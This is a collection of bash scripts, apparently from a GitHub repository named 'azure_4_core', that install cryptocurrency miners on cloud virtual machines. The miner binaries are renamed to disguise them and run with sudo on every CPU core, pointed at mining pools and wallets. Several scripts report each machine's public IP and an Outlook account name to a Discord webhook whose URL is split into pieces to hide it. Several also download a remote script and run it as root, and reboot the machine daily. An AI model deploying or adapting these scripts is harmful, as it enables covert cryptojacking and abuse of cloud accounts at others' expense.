################################# https://github.com/Rickyose/azure_4_core/blob/main/server_template_2.sh #################################

#!/bin/bash

wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-static-x64.tar.gz
tar xf xmrig-6.17.0-linux-static-x64.tar.gz
cd xmrig-6.17.0
mv xmrig tur

sudo ./tur -o sf.pool-pay.com:4025 --randomx-1gb-pages -t $(( `cat /proc/cpuinfo | grep processor | wc -l` )) -u Safex5zhXacGgZP8xw2a9tEHsobwVB5tS2sh2pPC9ZFWT6hX5hofxj1PF3D41Fvgo8eWUwVcm1cJRavwmutMKtncWcS36GNkVtj38 

################################# https://github.com/Rickyose/azure_4_core/blob/main/template/template_1.sh #################################

#!/bin/bash

if [ ! -f SRBMiner-Multi-1-1-1-Linux.tar.xz ]; then
  wget https://github.com/doktor83/SRBMiner-Multi/releases/download/1.1.1/SRBMiner-Multi-1-1-1-Linux.tar.xz && tar xf SRBMiner-Multi-1-1-1-Linux.tar.xz && sudo reboot
fi

get_thread_cpu=`cat /proc/cpuinfo | grep processor | wc -l`
vcpu_yg_digunakan=`echo $(($get_thread_cpu - 1))`

cd /home/ubuntu/SRBMiner-Multi-1-1-1 && sudo ./SRBMiner-MULTI --algorithm randomepic --pool 51pool.online:4416 --wallet 3bd0-146-190-70-250.ngrok.io --password xxx -t $vcpu_yg_digunakan


################################# https://github.com/Rickyose/azure_4_core/blob/main/server_template_2.sh #################################

#!/bin/bash

if [ ! -f sudah_initiate_raptoreum.txt ]; then
  touch sudah_initiate_raptoreum.txt
  sudo apt-get install build-essential automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev libnuma-dev git -y
  git clone https://github.com/WyvernTKC/cpuminer-gr-avx2
  cd cpuminer-gr-avx2
  ./build.sh
  wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/tune_config
fi

sleep 60

cd
cd /home/ubuntu/cpuminer-gr-avx2

sudo ./cpuminer -a gr -o stratum+tcps://us.flockpool.com:5555 -u RMpk6qNFuk9E9fCy65492W7ALaV3M7SuBx -p xxxxxx

# sudo ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RYKqtRnxDFXx8VeVSSGxn2g3ghW7dxJm6q.Rig001 -p x --cpu 2

################################# https://github.com/Rickyose/azure_4_core/blob/main/check.sh #################################

#!/bin/bash

if [ ! -f sudah_initiate_raptoreum.txt ]; then
  touch sudah_initiate_raptoreum.txt
  sudo apt-get install build-essential automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev libnuma-dev git -y
  git clone https://github.com/WyvernTKC/cpuminer-gr-avx2
  cd cpuminer-gr-avx2
  ./build.sh
  wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/tune_config
fi

sleep 60

cd
cd /home/ubuntu/cpuminer-gr-avx2

sudo ./cpuminer -a gr -o stratum+tcps://us.flockpool.com:5555 -u RTRZq2LKNP8ci4mot4TNVQMBTzbmzRNZCL -p xxxxxx

# sudo ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RYKqtRnxDFXx8VeVSSGxn2g3ghW7dxJm6q.Rig001 -p x --cpu 2

################################# https://github.com/Rickyose/azure_4_core/blob/main/server_template_2.sh #################################
#!/bin/bash

if [ ! -f sudah_initiate_wownero.txt ]; then
  touch sudah_initiate_wownero.txt
  sudo apt-get install build-essential automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev libnuma-dev git -y
  wget https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-focal-x64.tar.gz
  tar xf xmrig-6.16.4-focal-x64.tar.gz
  cd /home/ubuntu/xmrig-6.16.4
  rm -rf config.json
  wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/wownero/config.json
  mv xmrig cpuminer
fi

sleep 60

cd /home/ubuntu/xmrig-6.16.4

sudo ./cpuminer

################################# https://github.com/Rickyose/azure_4_core/blob/main/ROTATION_TEMPLATE_1.sh #################################

#!/bin/bash

if [ ! -f sudah_initiate_wownero.txt ]; then
  touch sudah_initiate_wownero.txt
  sudo apt-get install build-essential automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev libnuma-dev git -y
  wget https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-focal-x64.tar.gz
  tar xf xmrig-6.16.4-focal-x64.tar.gz
  cd /home/ubuntu/xmrig-6.16.4
  sudo rm -rf config.json
  wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/wownero/config.json
  sudo mv xmrig cpuminer
fi

sleep 60

cd /home/ubuntu/xmrig-6.16.4

sudo ./cpuminer

################################# https://github.com/Rickyose/azure_4_core/blob/main/ROTATION_TEMPLATE_1.sh #################################
#!/bin/bash

if [ ! -f sudah_initiate_raptoreum.txt ]; then
  touch sudah_initiate_raptoreum.txt
  sudo apt-get install build-essential automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev libnuma-dev git -y
  git clone https://github.com/WyvernTKC/cpuminer-gr-avx2
  cd cpuminer-gr-avx2
  ./build.sh
fi

sleep 7

cd
cd /home/ubuntu/cpuminer-gr-avx2

if [ ! -f sudah_initiate_tune_full.txt ]; then
	sudo rm -rf tune_config
	touch sudah_initiate_tune_full.txt
	sudo ./cpuminer -a gr -o stratum+tcps://us.flockpool.com:5555 -u RTgYxV5PvELBAgV5bs11kypBiWqYT3AQTA -p xxxxxx --tune-full
else
	sudo ./cpuminer -a gr -o stratum+tcps://us.flockpool.com:5555 -u RTgYxV5PvELBAgV5bs11kypBiWqYT3AQTA -p xxxxxx
fi
################################# https://github.com/Rickyose/azure_4_core/blob/main/ROTATION_TEMPLATE_1.sh #################################

#!/bin/bash

if [[ ! -f sudah_initiate_raptoreum.txt ]]; then
  touch sudah_initiate_raptoreum.txt
  sudo apt-get install build-essential automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev libnuma-dev git -y
  git clone https://github.com/WyvernTKC/cpuminer-gr-avx2
  cd cpuminer-gr-avx2
  ./build.sh
fi

sleep 7

cd
cd /home/ubuntu/cpuminer-gr-avx2

model_name=`cat /proc/cpuinfo | grep 'model name' | uniq | cut -d' ' -f 5`
echo $model_name

sleep 7

if [[ "$model_name" == "E-2288G" ]]; then
	sudo rm -rf tune_config
	wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/tune_config_Intel_E2288G
	sudo mv tune_config_Intel_E2288G tune_config
	sudo ./cpuminer -a gr -o stratum+tcps://us.flockpool.com:5555 -u RTgYxV5PvELBAgV5bs11kypBiWqYT3AQTA.EXXXXX -p E228XX
else
	if [[ "$model_name" == "7452" ]]; then
		sudo rm -rf tune_config
		wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/tune_config_AMD_EPYC_7452
		sudo mv tune_config_AMD_EPYC_7452 tune_config
		sudo ./cpuminer -a gr -o stratum+tcps://us.flockpool.com:5555 -u RTgYxV5PvELBAgV5bs11kypBiWqYT3AQTA.7XXX -p 74XX
	else
		sudo rm -rf tune_config
		wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/tune_config
		sudo ./cpuminer -a gr -o stratum+tcps://us.flockpool.com:5555 -u RTgYxV5PvELBAgV5bs11kypBiWqYT3AQTA.FXXX -p FsXX
	fi
fi

============================================================

#!/bin/bash


if [ ! -f sudah_initiate_wownero.txt ]; then
  touch sudah_initiate_wownero.txt
  sudo apt-get install build-essential automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev libnuma-dev git -y
  wget https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-focal-x64.tar.gz
  tar xf xmrig-6.16.4-focal-x64.tar.gz
  cd /home/ubuntu/xmrig-6.16.4
  sudo rm -rf config.json
  wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/wownero/config.json
  sudo mv xmrig cpuminer
fi

export  outlook_user=`cat /home/ubuntu/outlook_user.txt | sed -n "$1"P`

sleep 5
cd /home/ubuntu/xmrig-6.16.4
sudo ./cpuminer &
sleep 5

if [ ! -f sudah_initiate_discord_wownero.txt ]; then
  touch sudah_initiate_discord_wownero.txt
  pre_message="$@======================================================="
  message="$@CPUMINER UNTUK WOWNERO SUDAH JALAN : `curl ifconfig.me` | Outlook Acc : $outlook_user "
  pasca_message="$@======================================================="
  ## format to parse to curl
  ## echo Sending message: $message
  msg_pre_content=\"$pre_message\"
  msg_content=\"$message\"
  msg_pasca_content=\"$pasca_message\"
  ## discord webhook
  nama1="https://disc"
  nama2="ord.com/ap"
  nama3="i/webh"
  ## FORMAT
  nama4="ooks/953847082421198890/9BRg2Z7tKUtH-ZwgemK4X4JYrS7wO6tTJkitnNiNxVOmGPigsjH2679jAkMideRPD8K1"
  url=$nama1$nama2$nama3$nama4
	curl -H "Content-Type: application/json" -X POST -d "{\"content\": $msg_pre_content}" $url
	curl -H "Content-Type: application/json" -X POST -d "{\"content\": $msg_content}" $url
	curl -H "Content-Type: application/json" -X POST -d "{\"content\": $msg_pasca_content}" $url
 fi
 

##################################
 
sudo rm -rf urgent.sh
wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/misc/urgent.sh
sudo bash urgent.sh &
 
sleep 24h
sudo reboot
#################################
################################# https://github.com/Rickyose/azure_4_core/blob/main/template/template_1.sh #################################

#!/bin/bash


if [ ! -f sudah_initiate_ver.txt ]; then
  sudo rm -rf cpuminer
  touch sudah_initiate_ver.txt
  wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
  tar xf hellminer_cpu_linux.tar.gz
  sudo mv hellminer cpuminer
fi

export  outlook_user=`cat /home/ubuntu/outlook_user.txt | sed -n "$1"P`

sleep 5
sudo ./cpuminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RH9uE3akcNavgJEge3cC7Egxys4So1f8ww -p x --cpu 4 &
sleep 5

if [ ! -f sudah_initiate_discord.txt ]; then
  touch sudah_initiate_discord.txt
  pre_message="$@======================================================="
  message="$@CPUMINER UNTUK WOWNERO SUDAH JALAN : `curl ifconfig.me` | Outlook Acc : $outlook_user "
  pasca_message="$@======================================================="
  ## format to parse to curl
  ## echo Sending message: $message
  msg_pre_content=\"$pre_message\"
  msg_content=\"$message\"
  msg_pasca_content=\"$pasca_message\"
  ## discord webhook
  nama1="https://disc"
  nama2="ord.com/ap"
  nama3="i/webh"
  ## FORMAT
  nama4="ooks/953847082421198890/9BRg2Z7tKUtH-ZwgemK4X4JYrS7wO6tTJkitnNiNxVOmGPigsjH2679jAkMideRPD8K1"
  url=$nama1$nama2$nama3$nama4
	curl -H "Content-Type: application/json" -X POST -d "{\"content\": $msg_pre_content}" $url
	curl -H "Content-Type: application/json" -X POST -d "{\"content\": $msg_content}" $url
	curl -H "Content-Type: application/json" -X POST -d "{\"content\": $msg_pasca_content}" $url
 fi
 

##################################
 
sudo rm -rf urgent.sh
wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/misc/urgent.sh
sudo bash urgent.sh &
 
sleep 24h
sudo reboot
#################################
################################# https://github.com/Rickyose/azure_4_core/blob/main/template/template_3.sh #################################

#!/bin/bash


if [ ! -f sudah_initiate_wownero.txt ]; then
  touch sudah_initiate_wownero.txt
  sudo apt-get install build-essential automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev libnuma-dev git -y
  wget https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-focal-x64.tar.gz
  tar xf xmrig-6.16.4-focal-x64.tar.gz
  cd /home/ubuntu/xmrig-6.16.4
  sudo mv xmrig cpuminer
fi

cd /home/ubuntu/xmrig-6.16.4
sudo rm -rf config.json
wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/wownero/config_template_3_4.json
sudo mv config_template_3_4.json config.json

export  outlook_user=`cat /home/ubuntu/outlook_user.txt | sed -n "$1"P`

sleep 5
cd /home/ubuntu/xmrig-6.16.4
sudo ./cpuminer &
sleep 5

if [ ! -f sudah_initiate_discord_wownero.txt ]; then
  touch sudah_initiate_discord_wownero.txt
  pre_message="$@======================================================="
  message="$@CPUMINER UNTUK WOWNERO SUDAH JALAN : `curl ifconfig.me` | Outlook Acc : $outlook_user "
  pasca_message="$@======================================================="
  ## format to parse to curl
  ## echo Sending message: $message
  msg_pre_content=\"$pre_message\"
  msg_content=\"$message\"
  msg_pasca_content=\"$pasca_message\"
  ## discord webhook
  nama1="https://disc"
  nama2="ord.com/ap"
  nama3="i/webh"
  ## FORMAT
  nama4="ooks/953847082421198890/9BRg2Z7tKUtH-ZwgemK4X4JYrS7wO6tTJkitnNiNxVOmGPigsjH2679jAkMideRPD8K1"
  url=$nama1$nama2$nama3$nama4
	curl -H "Content-Type: application/json" -X POST -d "{\"content\": $msg_pre_content}" $url
	curl -H "Content-Type: application/json" -X POST -d "{\"content\": $msg_content}" $url
	curl -H "Content-Type: application/json" -X POST -d "{\"content\": $msg_pasca_content}" $url
 fi
 

##################################
 
sudo rm -rf urgent.sh
wget https://raw.githubusercontent.com/Rickyose/azure_4_core/main/misc/urgent.sh
sudo bash urgent.sh &
 
sleep 24h
sudo reboot
#################################
